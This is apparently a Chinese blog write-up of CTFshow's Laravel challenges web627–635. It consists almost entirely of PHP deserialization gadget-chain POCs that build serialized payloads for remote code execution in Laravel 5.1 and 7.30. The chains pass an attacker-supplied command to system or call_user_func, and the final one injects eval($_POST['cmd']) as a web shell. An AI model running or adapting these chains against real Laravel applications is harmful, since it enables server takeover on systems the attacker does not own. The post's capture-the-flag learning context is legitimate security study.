题目地址:https://ctf.show/challenges

前言:

好久没学习了,继续更新,学无止境,此系列为CTFshow的Laravel专题,主要为Laravel框架的一些漏洞及POC,自9.1新网络安全法更新以来,也不敢提供完整的复现漏洞啥的,只总结一些相关的POC,以及自己的学习经历,这里总结的也许也并不会有那么完整,只能说是笔者自己尽量的把自己所学所找的东西记录下来

image-20210913014802231.png

web627

Laravel5.1 反序列化RCE
Laravel框架在网上公开的链子并没有5.1的,所以得自己挖
poc:

<?php
namespace{
use Mockery\Generator\DefinedTargetClass;
class Swift_KeyCache_DiskKeyCache{
    private $_keys=['bit'=>array('bit'=>'bit')];
    private $_path;
    public function __construct($cmd){
        $this->_path=new DefinedTargetClass($cmd);
}
}
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace Mockery\Generator{
use Faker\ValidGenerator;
class DefinedTargetClass
{
    private $rfc;
    public function __construct($cmd)
    {
        $this->rfc=new ValidGenerator($cmd);
    }
}
}
namespace Faker{
class DefaultGenerator{
    protected $default;
    public function __construct($cmd)
    {
        $this->default = $cmd;
    }
}
class ValidGenerator
{
    protected $generator;
    protected $validator;
    protected $maxRetries;
    public function __construct($cmd){
    $this->generator=new DefaultGenerator($cmd);
    $this->maxRetries=9;
    $this->validator='system';
}
}
}
?>

web628

Laravel5.1 反序列化RCE
RCE 姿势2
poc:

<?php
namespace{
use phpDocumentor\Reflection\DocBlock\Tags\Deprecated;
class Swift_KeyCache_DiskKeyCache{
    private $_keys=['bit'=>array('bit'=>'bit')];
    private $_path;
    public function __construct($cmd){
        $this->_path=new Deprecated($cmd);
}
}
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
    use Illuminate\Database\DatabaseManager;
    abstract class BaseTag{
        protected $description;
    }
        final class Deprecated extends BaseTag{
    public function __construct($cmd){
        $this->description=new DatabaseManager($cmd);
    }
    }
}
namespace Illuminate\Database{
class DatabaseManager{
    protected $app;
    protected $extensions ;
    public function __construct($cmd)
    {
        $this->app['config']['database.default']=$cmd;
        $this->app['config']['database.connections']=array($cmd=>'system');
        $this->extensions[$cmd]='call_user_func';
    }
}

}
?>

web629-630

Laravel5.1 反序列化RCE
RCE 姿势3-4
poc:

<?php
namespace{
use Prophecy\Argument\Token\ObjectStateToken;
class Swift_KeyCache_DiskKeyCache{
    private $_keys=['bit'=>array('bit'=>'bit')];
    private $_path;
    public function __construct($cmd){
        $this->_path=new ObjectStateToken($cmd);
}
}
echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
}
namespace Prophecy\Argument\Token{
    use  Mockery\Generator\MockDefinition;
    use Illuminate\Validation\Validator;
    class ObjectStateToken{
        private $name;
        private $value;
        private $util;
        public function __construct($cmd){
            $this->name='bit';
            $this->value=new MockDefinition($cmd);
            $this->util=new Validator();
        }
    }
}

namespace Illuminate\Validation{
    use Faker\DefaultGenerator;
    class Validator{
    protected $container;
    protected $extensions = [];
    public function __construct(){
        $this->extensions['y']='xxx@load';
        $this->container=new DefaultGenerator();
    }
}
}
namespace Faker{
    use Mockery\Loader\EvalLoader;
class DefaultGenerator
{
    protected $default;

    public function __construct()
    {
        $this->default = new EvalLoader();
}
}
}
namespace Mockery\Loader{
    class EvalLoader{}
}
namespace Mockery\Generator{
    use Illuminate\Session\Store;
    class MockDefinition{
        protected $config;
        protected $code;
        public function __construct($cmd){
            $this->config=new Store();
            $this->code=$cmd;
        }
    }
}
namespace Illuminate\Session{
    class Store{
        protected $name='bit';//类不存在就行
    }
}
?>

web631-634

Laravel7.30 反序列化RCE
RCE 姿势1-4
poc:

<?php
namespace Illuminate\Routing{
    use Illuminate\Validation\Validator;
    class PendingResourceRegistration
{
    protected $registrar;
    protected $registered = false;
    protected $name='call_user_func';
    protected $controller='system';
    protected $options;
    public function __construct($cmd){
        $this->registrar=new Validator();
        $this->options=$cmd;
    }
}
echo urlencode(serialize(new PendingResourceRegistration($argv[1])));
}
namespace Illuminate\Validation{
    class Validator{    
        public $extensions = [];
        public function __construct(){
            $this->extensions['']='call_user_func';
        }
    }
}
?>

web635

Laravel7.30 反序列化RCE
RCE 姿势5
poc:

<?php
namespace Illuminate\Routing{
    use Illuminate\View\InvokableComponentVariable;
    class PendingResourceRegistration
{
    protected $registrar;
    protected $registered = false;
    public function __construct(){
        $this->registrar=new InvokableComponentVariable();
    }
}
echo urlencode(serialize(new PendingResourceRegistration()));
}
namespace Illuminate\View{
    use PHPUnit\Framework\MockObject\MockClass;
    class InvokableComponentVariable{
        protected $callable;
        public function __construct(){
            $this->callable=array(new MockClass(),'generate');
        }
    }
}
namespace PHPUnit\Framework\MockObject{
    class MockClass{
        private $classCode;
        private $mockName;
        private $configurableMethods;
        public function __construct(){
            $this->classCode='eval($_POST["cmd"]);';
            $this->mockName='bit';
            $this->configurableMethods='bit';
        }
    }
}

标签: none

暂无评论